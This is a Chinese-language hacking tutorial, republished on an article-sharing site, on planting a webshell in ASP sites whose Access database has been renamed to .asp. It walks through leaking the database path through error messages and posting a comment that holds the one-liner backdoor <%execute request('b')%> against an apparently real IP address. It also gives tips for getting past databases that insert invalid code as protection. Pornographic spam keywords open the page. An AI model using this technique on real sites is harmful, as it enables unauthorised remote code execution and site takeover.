国产一级a片免费看高清,亚洲熟女中文字幕在线视频,黄三级高清在线播放,免费黄色视频在线看

打開APP
userphoto
未登錄

開通VIP,暢享免費(fèi)電子書等14項(xiàng)超值服

開通VIP
改mdb為asp所帶來地災(zāi)難
可能是隨著網(wǎng)絡(luò)安全技術(shù)的發(fā)展吧,管理員的素質(zhì)都在提高,在使用access+asp系統(tǒng)時(shí),為不數(shù)據(jù)庫被人下載,到把mdb改為asp或asa。先不說直接改后綴,直接可以用網(wǎng)快等工具直接下載,其實(shí)這樣你已經(jīng)是為入侵者打開了大門。入侵者可以利用asp/asa為后綴的數(shù)據(jù)庫直接得到webshell。
一.思路
大家都知道<%%>為asp文件的標(biāo)志符,也就是說一個(gè)asp文件只會(huì)去執(zhí)行<% %><% %>之間的代碼,access+asp的web系統(tǒng)的所有數(shù)據(jù)都是存放在數(shù)據(jù)庫文件里(mdb文件),由于管理者把mdb文件改為了asp文件,如果我們提交的數(shù)據(jù)里包含有<% %><%%>,那當(dāng)我們?cè)L問這個(gè)asp數(shù)據(jù)庫的時(shí)候就會(huì)去執(zhí)行<%%><% %>之間的代碼。這樣導(dǎo)致我們只提交惡意代碼給數(shù)據(jù)庫,那么asp后綴的數(shù)據(jù)庫就是我們的webshell了。
二.示例
 
隨便找個(gè)目標(biāo),首先我們暴庫,看是不是asp后綴的數(shù)據(jù)庫:
返回:
 
Microsoft VBScript 編譯器錯(cuò)誤 錯(cuò)誤 '800a03f6'
缺少 'End'
/iisHelp/common/500-100.asp,行242
Microsoft JET Database Engine 錯(cuò)誤 '80004005'
'D:\log_mdb\%29dlog_mdb%29.asp'不是一個(gè)有效的路徑。 確定路徑名稱拼寫是否正確,以及是否連接到文件存放的服務(wù)器。
/test/conn.asp,行18
 
我們提交:http://220.170.151.103/test/dlog/log_mdb/%2529dlog_mdb%2529.asp返回一堆的亂碼,這樣我們可以直接用網(wǎng)際快車等工具直接下載數(shù)據(jù)庫(這里我們不討論)。我們回到主頁看到有提供“網(wǎng)友評(píng)論”功能。我們注冊(cè)個(gè)用戶,發(fā)一條評(píng)論:

< %execute request("b")%>
 
這樣我們就把a(bǔ)sp代碼:<%execute request("b")%><%execute request("b")%>寫入了數(shù)據(jù)庫,那么數(shù)據(jù)庫:就是我們的webshell咯。提交:http://220.170.151.103/test/dlog/log_mdb/%2529dlog_mdb%2529.asp在亂碼的最后我們看到:

/iisHelp/common/500-100.asp,行242
Microsoft VBScript 運(yùn)行時(shí)錯(cuò)誤 錯(cuò)誤 '800a000d'
類型不匹配: 'execute'
/test/dlog/log_mdb/%29dlog_mdb%29.asp,行1266
 
我們的插入的代碼運(yùn)行了。如下圖:
 
注意:我們?cè)谙驍?shù)據(jù)庫提交代碼時(shí),代碼內(nèi)容不可以太大。所以我們采用<%execute request("b")%><%execute request("b")%>。
三.其他一些問題和思路
1.對(duì)于改了后綴為asp,還對(duì)數(shù)據(jù)庫里加入了<%=’a’-1%><%=’a’-1%>等非法的asp代碼來徹底防止下載的數(shù)據(jù)庫,由于里面存在了非法的asp代碼,插入我們的webshell代碼后運(yùn)行,將只會(huì)顯示前面非法代碼的錯(cuò)誤,而不去執(zhí)行我們shell的代碼。雖然這樣可以防止一定的攻擊,但還是存在一定的隱患,我們只要在出錯(cuò)的代碼前加入兼容錯(cuò)誤的代碼,就可以得到正確顯示執(zhí)行我們插入的webshell代碼了。
2.對(duì)于沒有改后綴的,也就是mdb文件,這樣我們可以先直接下載下來得到后臺(tái)密碼,進(jìn)了后臺(tái),可以利用數(shù)據(jù)庫備用改后綴為asp。
文章來自: ASP技術(shù)網(wǎng)站(www.aspjs.net) 詳文參考:http://www.aspjs.net/aspjs1html/ASPjiaocheng/ASPjishuziliao/492.html
本站僅提供存儲(chǔ)服務(wù),所有內(nèi)容均由用戶發(fā)布,如發(fā)現(xiàn)有害或侵權(quán)內(nèi)容,請(qǐng)點(diǎn)擊舉報(bào)。
打開APP,閱讀全文并永久保存 查看更多類似文章
猜你喜歡
類似文章
教你巧妙利用.mdb后綴數(shù)據(jù)庫做后門
獲取webshell的十種方法(1) - 51CTO.COM
攻防實(shí)戰(zhàn) 步步滲透網(wǎng)站獲得系統(tǒng)權(quán)限(圖)
關(guān)于web服務(wù)器的攻擊方式匯總
六種后臺(tái)拿shell的方法
攻擊數(shù)據(jù)庫從而入侵網(wǎng)站
更多類似文章 >>
生活服務(wù)
分享 收藏 導(dǎo)長(zhǎng)圖 關(guān)注 下載文章
綁定賬號(hào)成功
后續(xù)可登錄賬號(hào)暢享VIP特權(quán)!
如果VIP功能使用有故障,
可點(diǎn)擊這里聯(lián)系客服!

聯(lián)系客服